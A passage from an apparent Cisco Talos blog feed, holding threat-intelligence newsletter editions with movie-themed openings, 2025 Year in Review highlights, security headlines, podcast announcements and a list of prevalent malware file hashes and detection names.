of the Threat Source newsletter.&#xA0;</p><p>Anyone who&#xA0;spoke with&#xA0;me&#xA0;in&#xA0;the&#xA0;last several weeks has had to deal with me&#xA0;loudly waiting in&#xA0;anticipation for&#xA0;the long-awaited&#xA0;&#x201C;Project Hail Mary&#x201D;&#xA0;movie adaptation.&#xA0;I read&#xA0;(and&#xA0;cried over)&#xA0;the book by Andy Weir,&#xA0;who&#x2019;s&#xA0;also the author of&#xA0;&#x201C;The Martian,&#x201D;&#xA0;about a year ago and,&#xA0;shortly&#xA0;after,&#xA0;found out it was&#xA0;being made into&#xA0;a movie.&#xA0;</p><p>(I know what&#xA0;you&#x2019;re&#xA0;thinking: Two movie-themed editions in two weeks?&#xA0;It&#x2019;s&#xA0;every cinephile&#x2019;s dream!)&#xA0;</p><p>Anyway, the story centers around a biologist and science&#xA0;teacher named Ryland Grace&#xA0;(Ryan Gosling), who wakes up&#xA0;from a coma&#xA0;on a&#xA0;spaceship lightyears&#xA0;away from Earth, his two crewmembers long dead.&#xA0;Our planet&#x2019;s sun is slowly&#xA0;dimming,&#xA0;its energy being&#xA0;consumed&#xA0;by alien microbes&#xA0;called &#x201C;astrophage&#x201D;&#xA0;that&#xA0;are infecting all the stars&#xA0;in our stellar&#xA0;neighborhood&#xA0;&#x2014;&#xA0;except one. Grace&#x2019;s task&#xA0;is to figure out why this&#xA0;star is unaffected and send the solution back to Earth.&#xA0;It&apos;s&#xA0;a one-way trip, and&#xA0;he&#x2019;ll&#xA0;eventually&#xA0;die&#xA0;in space alone...&#xA0;or so&#xA0;he&#xA0;thinks.&#xA0;</p><p>The movie&#xA0;met 99.9% of my expectations, which is rare for an adaptation.&#xA0;The humor was spot-on,&#xA0;the soundtrack was gorgeous,&#xA0;and the puppetry&#xA0;&#x2014;&#xA0;yes, the&#xA0;<a href="https://youtube.com/shorts/lQrNFU2w9Xw?si=kVwyBBCeXHWBBV2Z" rel="noreferrer noopener"><u>puppetry</u></a>&#xA0;(mild&#xA0;spoilers&#xA0;for Rocky, Grace&#x2019;s new alien friend)&#xA0;&#x2014;&#xA0;was out-of-this-world.&#xA0;</p><p>While&#xA0;it&#xA0;<em>is</em>&#xA0;a story about space,&#xA0;it&#x2019;s&#xA0;first and foremost&#xA0;about communication, trust, and collaboration&#xA0;&#x2014;&#xA0;things&#xA0;we&#x2019;re&#xA0;no strangers to at Talos, especially&#xA0;when creating the&#xA0;Year in Review&#xA0;report&#xA0;(which&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview" rel="noreferrer noopener"><strong><u>is</u></strong>&#xA0;<strong><u>available now</u></strong></a>).&#xA0;The entire processof creating this report, from raw data to final design, is only a little bit less monumental than stopping alien microbes from&#xA0;plunging the earth into an ice age.&#xA0;</p><p>The process begins with Talos&#x2019; Strategic Analysis team, who&#xA0;leverage&#xA0;the vast amount of Cisco&#x2019;s telemetry, Talos research, and&#xA0;data from Talos Incident Response cases to analyze trends over the past year. This analysis is synthesized into a comprehensive report, which undergoes rigorous review and proofing at multiple levels. While the report is being drafted, the Strategic Comms team develops a detailed schedule of content and collateral to promote it both internally and externally, meeting weekly to track our progress. Once the text is&#xA0;finalized, it moves to our design team, who transform the data into a visually stunning, accessible format. Even after the report launches,&#xA0;the&#xA0;work continues:&#xA0;We produce videos,&#xA0;<a href="https://www.reddit.com/r/cybersecurity/comments/1s46l9v/were_cisco_talos_ask_us_anything_24h_ama/" rel="noreferrer"><u>answer your questions on Reddit</u></a>&#xA0;(today only!),&#xA0;record podcasts, create social media graphics,&#xA0;and&#xA0;collaborate across Cisco&#xA0;to ensure our findings reach the right people.&#xA0;</p><p>We do this for the good of the community. Our report&#xA0;isn&#x2019;t&#xA0;gated, and it never will be; you can read it right in your browser without filling out&#xA0;fake names and emails in&#xA0;annoying forms. Talos&#x2019; job is to keep as many people as safe as possible, and that means free access to critical information.&#xA0;Here&apos;s&#xA0;a taste of our findings:&#xA0;</p><ul><li>React2Shell was the&#xA0;No.&#xA0;1 most targeted CVE in 2025 despite&#xA0;only&#xA0;being&#xA0;discovered&#xA0;in&#xA0;December.&#xA0;ToolShell&#xA0;was&#xA0;No.&#xA0;3 despite being released in June.&#xA0;</li><li>About 25% of the vulnerabilities on our top 100 list affect widely used frameworks and libraries, highlighting the risk of supply chain-style attacks.&#xA0;</li><li>Nearly a&#xA0;third of MFA spray attacks targeted identity and access management (IAM) applications.&#xA0;</li><li>Attackers continued to rely heavily on phishing for&#xA0;initial&#xA0;access,&#xA0;observed&#xA0;in 40% of Talos IR cases.&#xA0;35% of cases involved internal phishing.&#xA0;</li><li>Qilin&#xA0;was the most seen ransomware variant in 2025,&#xA0;with over 40 victims each month except January.&#xA0;</li></ul><p>We also offer insights on AI and state-sponsored threats, so be sure to&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview" rel="noreferrer noopener"><u>view the full report</u></a>.&#xA0;</p><p>In&#xA0;&#x201C;Project Hail&#xA0;Mary,&#x201D;&#xA0;Grace&#xA0;and his&#xA0;alien&#xA0;friend, Rocky,&#xA0;realize that they&#xA0;can&apos;t&#xA0;save their respective worlds alone.&#xA0;The Talos Year in Review is the result of a massive, cross-functional mission. It takes&#xA0;collaboration between all of Talos&#x2019; teams to turn complex, often daunting telemetry into actionable intelligence&#xA0;for the community.&#xA0;</p><p>When we share knowledge, communicate clearly, and work together, the results are,&#xA0;to quote Rocky,&#xA0;&#x201C;Amaze! Amaze! Amaze!&#x201D;&#xA0;</p><p>Stay tuned over the coming days and weeks as&#xA0;we break each section down into the most important&#xA0;2025 Year&#xA0;in Review findings&#xA0;you need to know.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/Screenshot-2026-03-26-at-10.06.49---AM.png" class="kg-image" alt="A puppet made me cry and all I got was this t-shirt" loading="lazy" width="2000" height="668" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/Screenshot-2026-03-26-at-10.06.49---AM.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/Screenshot-2026-03-26-at-10.06.49---AM.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/Screenshot-2026-03-26-at-10.06.49---AM.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/Screenshot-2026-03-26-at-10.06.49---AM.png 2400w" sizes="(min-width: 720px) 720px"></figure><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>One of the main themes from the&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview/" rel="noreferrer noopener"><u>2025</u>&#xA0;<u>Year in Review&apos;s</u></a>&#xA0;vulnerability data is that attackers are targeting identity by compromising the infrastructure that sits around it, including physical hardware devices, software, and management platforms. Network components act as de facto identity gateways, allowing adversaries to impersonate users, bypass MFA, and traverse networks undetected. Attackers overwhelmingly prefer high-access targets that require minimal exploitation steps and yield&#xA0;maximum&#xA0;operational payoff.&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>Identity-centric network components act as control points for the entire environment, meaning their compromise can invalidate MFA, bypass segmentation, and grant immediate access to high-value resources. Network management platforms give adversaries direct access to privileged administrative functions, device credentials, and automation pipelines that touch hundreds of downstream systems. Compromising a single ADC or management platform can expose dozens of downstream systems, making these devices powerful force multipliers.&#xA0;</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>Organizations should consider the impact on identity when prioritizing the patching of network devices. ADCs must be protected as identity control points, not merely performance appliances. Defenders should focus on these high-leverage vulnerability classes that enable identity compromise, policy manipulation, and infrastructure-wide escalation.&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview/" rel="noreferrer noopener"><u>Read the full Year in Review for more information.</u></a></p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>U.S. Department of Energy publishes five-year energy security plan</strong>&#xA0;<br>The three goals are to develop &#x2018;world-class&#x2019; security technologies, to harden the US energy infrastructure, and&#xA0;establish&#xA0;emergency preparedness for response and recovery from incidents. (<a href="https://www.securityweek.com/doe-publishes-5-year-energy-security-plan/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>Someone has publicly leaked an exploit kit that can hack millions of iPhones</strong>&#xA0;<br>Researchers are warning that this will allow any hacker to easily use the tools to target iPhone users running older versions of Apple&#x2019;s operating systems who have not yet updated to its latest iOS 26 software. (<a href="https://techcrunch.com/2026/03/23/someone-has-publicly-leaked-an-exploit-kit-that-can-hack-millions-of-iphones/" rel="noreferrer noopener"><u>TechCrunch</u></a>)&#xA0;</p><p><strong>Checkmarx</strong>&#xA0;<strong>KICS</strong>&#xA0;<strong>code</strong>&#xA0;<strong>scanner</strong>&#xA0;<strong>targeted in</strong>&#xA0;<strong>widening</strong>&#xA0;<strong>supply</strong>&#xA0;<strong>chain</strong>&#xA0;<strong>hit</strong>&#xA0;<br>Specifically, the cybercriminals infiltrated KICS GitHub Action, which organizations use to run KICS scans within their CI/CD pipelines, and poisoned multiple versions of the software. (<a href="https://www.darkreading.com/application-security/checkmarx-kics-code-scanner-widening-supply-chain" rel="noreferrer noopener"><u>Dark Reading</u></a>)&#xA0;</p><p><strong>Attackers hide infostealer in copyright infringement notices</strong>&#xA0;<br>Aimed at organizations in critical sectors, including healthcare, government, hospitality, and education, it&#xA0;attempts&#xA0;to install&#xA0;PureLog&#xA0;Stealer, a low-cost infostealer easy for threat actors to use. (<a href="https://www.darkreading.com/cyberattacks-data-breaches/attackers-hide-infostealer-copyright-infringement-notices" rel="noreferrer noopener"><u>Dark Reading</u></a>)&#xA0;</p><p><strong>Oracle releases emergency patch for critical identity manager vulnerability</strong>&#xA0;<br>CVE-2026-21992 can be used without authentication for remote code execution and it may have been exploited in the wild. (<a href="https://www.securityweek.com/oracle-releases-emergency-patch-for-critical-identity-manager-vulnerability/?utm_source=tldrit" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://www.reddit.com/r/cybersecurity/comments/1s46l9v/were_cisco_talos_ask_us_anything_24h_ama/" rel="noreferrer noopener"><strong><u>Today only: Ask us anything</u></strong></a>&#xA0;<br>Talos and Splunk researchers are standing by on Reddit to answer your questions about the Year in Review, Top 50 Cybersecurity Threats report, or&#xA0;just about anything&#xA0;else you want to know.&#xA0;It&#x2019;s&#xA0;halfway&#xA0;over, so post&#xA0;your questions&#xA0;now!&#xA0;</p><p><a href="https://youtu.be/3-QauJkxsN4" rel="noreferrer noopener"><strong><u>Year in Review highlights</u></strong></a>&#xA0;<br>In 2025, attackers moved fast, but they also played the long game. This short video highlights the biggest trends from the 2025 Talos Year in Review and what they reveal about where the threat landscape is headed.&#xA0;</p><p><a href="https://www.buzzsprout.com/2033817/episodes/18880840" rel="noreferrer noopener"><strong><u>Gravy, glutes, and the Talos Year in Review</u></strong></a>&#xA0;<br>Hazel, Bill, Joe,&#xA0;and Dave&#xA0;discuss&#xA0;the 2025 Year in Review, supported as always by the&#xA0;Turkey&#xA0;Lurkey Man.&#xA0;We also discuss the cyber activity tied to the situation in the Middle East.&#xA0;</p><p><a href="https://www.buzzsprout.com/2018149/episodes/18892624" rel="noreferrer noopener"><strong><u>Cybersecurity&#x2019;s double-header</u></strong></a>&#xA0;<br>With the recent release of the Year in Review and Splunk&#x2019;s Top 50 Cybersecurity Threats report,&#xA0;Amy, Bill, and Lou&#xA0;break&#xA0;down the most critical trends that shaped the security landscape last year.&#xA0;</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://www.botconf.eu/" rel="noreferrer noopener"><u>Botconf 2026</u></a>&#xA0;(April&#xA0;15 &#x2013; 17) Reims, France&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;<br>Example Filename: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507.exe&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201&#xA0;</p><p><strong>SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974&#xA0;</strong><br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;<br>Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0;</strong><br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</u></a>&#xA0;<br>Example Filename: APQ9305.dll&#xA0;<br>Detection Name: Auto.90B145.282358.in02&#xA0;</p><p><strong>SHA256: 5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe&#xA0;</strong><br>MD5: a2cf85d22a54e26794cbc7be16840bb1&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe</u></a>&#xA0;<br>Example Filename: a2cf85d22a54e26794cbc7be16840bb1.exe&#xA0;<br>Detection Name: W32.5E6060DF7E-100.SBX.TG&#xA0;</p><p><strong>SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91&#xA0;</strong><br>MD5: 7bdbd180c081fa63ca94f9c22c457376&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</u></a>&#xA0;<br>Example Filename: d4aa3e7010220ad1b458fac17039c274_62_Exe.exe&#xA0;<br>Detection Name:&#xA0;Win.Dropper.Miner::95.sbx.tg&#xA0;</p><p><strong>SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55&#xA0;</strong><br>MD5: 41444d7018601b599beac0c60ed1bf83&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55</u></a>&#xA0;<br>Example Filename: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55.js&#xA0;<br>Detection Name: W32.38D053135D-95.SBX.TG&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[Talos Takes: 2025 insights from Talos and Splunk]]></title><description><![CDATA[This episode of Talos Takes breaks down the 2025 Year in Review as well as Splunk's Top 50 Cybersecurity Threats report.]]></description><link>https://blog.talosintelligence.com/cybersecuritys-double-header-2025-insights-from-talos-and-splunk/</link><guid isPermaLink="false">69c29d998f3b4700016ef31f</guid><category><![CDATA[2025YiR]]></category><category><![CDATA[Year In Review]]></category><dc:creator><![CDATA[Amy Ciminnisi]]></dc:creator><pubDate>Thu, 26 Mar 2026 12:48:18 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_cover_2x1-2-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_cover_2x1-2-1.jpg" alt="Talos Takes: 2025 insights from Talos and Splunk"><p>In this episode of Talos Takes, Amy is joined by William Largent (Cisco Talos) and Lou Stella (Splunk) for a &quot;double-header&quot; discussion. With the recent release of the <a href="https://blog.talosintelligence.com/2025yearinreview/" rel="noreferrer">Cisco Talos 2025 Year in Review</a> and the <a href="https://www.splunk.com/en_us/campaigns/top-50-security-threats.html" rel="noreferrer">Splunk Top 50 Cybersecurity Threats report</a>, we&#x2019;re breaking down the most critical trends that shaped the security landscape last year &#x2014; all based on Cisco telemetry, Talos&apos; original research, and Talos Incident Response engagements.</p><p>From the professionalization of ransomware-as-a-service to the persistent challenge of decade-old vulnerabilities, this episode moves beyond the headlines to provide a practical roadmap for defenders. You&#x2019;ll get tips on how to prioritize your defenses and reduce your attack surface for the year ahead.</p><figure class="kg-card kg-embed-card"><iframe style="border-radius: 12px" width="100%" height="152" title="Spotify Embed: Cybersecurity&#x2019;s double-header: 2025 insights from Talos and Splunk" frameborder="0" allowfullscreen allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy" src="https://open.spotify.com/embed/episode/5Fq96RXfdCVwCejryQuUlp?si=0e0d81d2745340a9&amp;utm_source=oembed"></iframe></figure><p><a href="https://blog.talosintelligence.com/2025yearinreview/" rel="noreferrer">View the 2025 Year in Review today.</a></p>]]></content:encoded></item><item><title><![CDATA[Beers with Talos breaks down the 2025 Talos Year in Review]]></title><description><![CDATA[The Beers with Talos team unpack the biggest cybersecurity threats of 2025, from React2Shell to ransomware and identity abuse, and what it all means for defenders going forward.]]></description><link>https://blog.talosintelligence.com/beers-with-talos-breaks-down-the-2025-talos-year-in-review/</link><guid isPermaLink="false">69c127b022cc820001d8eb5a</guid><category><![CDATA[2025YiR]]></category><category><![CDATA[Year In Review]]></category><dc:creator><![CDATA[Hazel Burton]]></dc:creator><pubDate>Mon, 23 Mar 2026 12:55:29 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_cover_2x1-2.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_cover_2x1-2.jpg" alt="Beers with Talos breaks down the 2025 Talos Year in Review"><p>The Beers with Talos B team (that&#x2019;s Hazel, Bill, Joe and Dave) break down (sometimes in the literal sense) the 2025 Talos Year in Review which is <a href="https://blog.talosintelligence.com/beers-with-talos-breaks-down-the-2025-talos-year-in-review/" rel="noreferrer">available&#xA0;now</a>.</p><p>The team dives into the biggest cybersecurity trends of the year, including:</p><ul><li>The rapid weaponization of new vulnerabilities</li><li>Why identity abuse showed up everywhere&#xA0;</li><li>Ransomware trends</li><li>A rise in APT investigations</li><li>What defenders should prioritize heading into the year ahead</li></ul><p>Before that, we discuss the cyber activity tied to the situation in the Middle East (full details on our <a href="https://blog.talosintelligence.com/talos-developing-situation-in-the-middle-east" rel="noreferrer">blog</a>).</p><p>There&#x2019;s also an alarming amount of discussion about glutes. And gravy. Listen here:</p><figure class="kg-card kg-embed-card"><iframe style="border-radius: 12px" width="100%" height="152" title="Spotify Embed: Gravy, Glutes, and the Talos Year in Review" frameborder="0" allowfullscreen allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy" src="https://open.spotify.com/embed/episode/3zRTu3Ai8jatnM3m1o7kNc?si=UMAdsSLHTRisLzp21kXLaA&amp;utm_source=oembed"></iframe></figure><p><a href="https://blog.talosintelligence.com/2025yearinreview" rel="noreferrer">Download the full 2025 Talos Year in Review today.</a></p>]]></content:encoded></item><item><title><![CDATA[2025 Talos Year in Review: Speed, scale, and staying power]]></title><description><![CDATA[The 2025 Talos Year in Review is available now. Understand evolving adversary playbooks and how to strengthen your organization’s defenses.]]></description><link>https://blog.talosintelligence.com/2025-talos-year-in-review-speed-scale-and-staying-power/</link><guid isPermaLink="false">69ba941222cc820001d8ea76</guid><category><![CDATA[Year In Review]]></category><category><![CDATA[2025YiR]]></category><dc:creator><![CDATA[Cisco Talos]]></dc:creator><pubDate>Mon, 23 Mar 2026 12:01:24 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_cover_2x1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_cover_2x1.jpg" alt="2025 Talos Year in Review: Speed, scale, and staying power"><p>The 2025 Talos Year in Review is now available to&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview"><u>view online</u></a>.</p><p>The pace and scale of adversary activity in 2025 placed sustained pressure on security teams across industries. As with each annual report, our goal at Talos is to provide the security community with a clear analysis of the tactics, techniques, and procedures that shaped adversary operations, and to help organizations prioritize the actions that reduce exposure and strengthen defenses.</p><h3 id="what-defined-2025">What defined 2025</h3><p>Three themes emerged consistently across Talos&#x2019; threat research, telemetry, and incident response engagements:</p><p><strong>1. Exploitation at both extremes</strong></p><p>New large-scale vulnerabilities were operationalized almost immediately, but adversaries also continued to exploit CVEs that have been exposed for years. This rapid operationalization of new vulnerabilities reflects a rise in automated exploit development, public proof-of-concept code, and mature adversary coordination.</p><p>React2Shell, released in December, ranked first by year&#x2019;s end only three weeks after disclosure, while a vulnerability disclosed 12 years ago ranked seventh. That range tells a story about organizational technical debt: Long-standing exposure continues to be reliably and successfully exploited.</p><p><strong>2. The architecture of trust</strong></p><p>In 2025, adversaries focused on the systems that manage authentication, authorization, and device trust.</p><p>Attackers who gained access through compromised credentials stealthily extended that access through internal phishing and abuse of identity controls within network infrastructure.&#xA0;Control of identity often meant control of the environment.</p><p><strong>3. Targeting centralized systems for more leverage</strong></p><p>Threat actors targeted centralized infrastructure, management platforms, and shared frameworks to expand the impact of a single compromise.</p><p>Approximately 25% of the vulnerabilities in the Top 100 targeted list affected widely used frameworks and libraries that are embedded deep within the software stack. Because these components underpin applications and network appliances across vendors, a single CVE can create mass exploitation potential across industries. Compromising these shared foundations enabled lateral movement across environments.&#xA0;</p><h3 id="read-the-full-report">Read the full report</h3><p>View the&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview"><u>full report online</u></a>&#xA0;(it&#x2019;s not gated and never will be) to see where attackers are gaining ground, and how to disrupt their playbook.&#xA0;</p><div class="kg-card kg-header-card kg-v2 kg-width-regular " data-background-color="#000000">
            
            <picture><img class="kg-header-card-image" src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_background-2.jpg" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/YiR2025_background-2.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/YiR2025_background-2.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/YiR2025_background-2.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_background-2.jpg 2000w" loading="lazy" alt="2025 Talos Year in Review: Speed, scale, and staying power"></picture>
        
            <div class="kg-header-card-content">
                
                <div class="kg-header-card-text kg-align-center">
                    <h2 id="read-the-2025-cisco-talos-year-in-review" class="kg-header-card-heading" style="color: #FFFFFF;" data-text-color="#FFFFFF"><span style="white-space: pre-wrap;">Read the 2025 Cisco Talos Year in Review</span></h2>
                    
                    <a href="https://blog.talosintelligence.com/content/files/2026/03/2025YiR-report.pdf" class="kg-header-card-button kg-style-accent" style="color: #FFFFFF;" data-button-color="accent" data-button-text-color="#FFFFFF">Download now</a>
                </div>
            </div>
        </div>]]></content:encoded></item><item><title><![CDATA[You have to invite them in]]></title><description><![CDATA[While a garlic and wooden stakes keep the vampires at bay in movies, they won’t save your network once an attacker has been "invited in." Discover why identity is the new frontier of cyber horror in this week’s edition. ]]></description><link>https://blog.talosintelligence.com/you-have-to-invite-them-in/</link><guid isPermaLink="false">69baeff122cc820001d8eaa3</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Hazel Burton]]></dc:creator><pubDate>Thu, 19 Mar 2026 18:00:34 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/threat_source-2.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/threat_source-2.jpg" alt="You have to invite them in"><p>Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0;</p><p>I found myself watching the Oscars ceremony in its entirety for the first time in a few years.&#xA0;I&#x2019;m&#xA0;in the U.K., so I watched it the&#xA0;following&#xA0;day. With next week&#x2019;s Year in Review launch looming and several pieces of content still to&#xA0;finalise,&#xA0;two hours of sleep&#xA0;didn&#x2019;t&#xA0;seem&#xA0;like the best idea.&#xA0;</p><p>My overriding thought from the ceremony was:&#xA0;<em>How much poorer would this have been without&#xA0;&#x201C;Sinners?&#x201D;</em>&#xA0;</p><p>A purely original film (deservedly the winner of Best Original Screenplay),&#xA0;&#x201C;Sinners&#x201D;&#xA0;is set in 1932 in the Jim Crow-era Mississippi Delta. The storytelling&#xA0;is&#xA0;rooted in survival,&#xA0;connections to the past and the future,&#xA0;and cultural identity. And the music. Oh man, the music.&#xA0;</p><p>It is also (mild spoiler warning) a vampire movie.&#xA0;</p><p>Under the direction and quill of&#xA0;Ryan Coogler, the vampires&#xA0;take on an&#xA0;identity&#xA0;I&#xA0;haven&#x2019;t&#xA0;seen&#xA0;before&#xA0;&#x2014;&#xA0;they&#x2019;re&#xA0;colonists.&#xA0;Some of them&#xA0;belong to the KKK.&#xA0;And they&#xA0;occasionally&#xA0;jig.&#xA0;</p><p>In&#xA0;&#x201C;Sinners,&#x201D;&#xA0;they feed on vitality they&#xA0;can&#x2019;t&#xA0;generate themselves. They circle&#xA0;a&#xA0;juke joint run by twin brothers Smoke and Stack, both played by (now Oscar winner) Michael B. Jordan in&#xA0;performances(emphasis on the plural)&#xA0;so&#xA0;clever&#xA0;and distinct you could almost believe they were played by different actors.&#xA0;</p><p>My husband insists he enjoyed the film right up until the vampires appeared. After that, he says, it became less interesting.&#xA0;</p><p>He is, of course,&#xA0;terribly&#xA0;and demonstrably wrong.&#xA0;</p><p>Vampire stories&#xA0;are awesome. And they&#xA0;come with&#xA0;generally well-agreed&#xA0;rules:&#xA0;</p><ul><li>They despise garlic.</li><li>They&#x2019;re&#xA0;not keen on fire or stakes through the heart.</li><li>They&#xA0;have to&#xA0;be invited in.</li></ul><p>Cue the perilous segue to a security topic&#x2026;&#xA0;</p><p>In our upcoming 2025&#xA0;Talos&#xA0;Year in Review, attacks on identity&#xA0;emerged&#xA0;as the dominant theme across multiple vectors. Attackers&#xA0;are&#xA0;not so much&#xA0;trying to batter down doors with noisy exploits. Increasingly,&#xA0;they&#x2019;re&#xA0;looking to be invited in as a recognisable user. And once inside, their goal is to&#xA0;operate&#xA0;as if they own the place.&#xA0;&#xA0;</p><p>Most organisations have boundaries. Segmentation.&#xA0;Authentication. But when consent is manipulated&#xA0;(e.g.,&#xA0;through social engineering),&#xA0;the system&#xA0;can&#xA0;authorise the intrusion itself.&#xA0;</p><p>One of the&#xA0;most&#xA0;common techniques&#xA0;we&#xA0;see involves attackers persuading victims to read out their&#xA0;multi-factor&#xA0;authentication&#xA0;request&#xA0;code in real time, often over the phone, posing as IT support or a trusted vendor. In other cases, adversary-in-the-middle phishing kits proxy the legitimate login&#xA0;page and&#xA0;capture the one-time code as&#xA0;it&#x2019;s&#xA0;entered.&#xA0;</p><p>The code is valid.&#xA0;</p><p>The authentication succeeds.&#xA0;</p><p>The session is issued.&#xA0;</p><p>In 2025,&#xA0;nearly a&#xA0;third of MFA spray attacks&#xA0;targeted&#xA0;identity&#xA0;access&#xA0;management&#xA0;(IAM)&#xA0;applications.&#xA0;Add&#xA0;to&#xA0;that a 178% surge in fraudulent device registration events, and the trend is&#xA0;clear:&#xA0;Attackers are targeting the mechanisms that issue invitations in the first 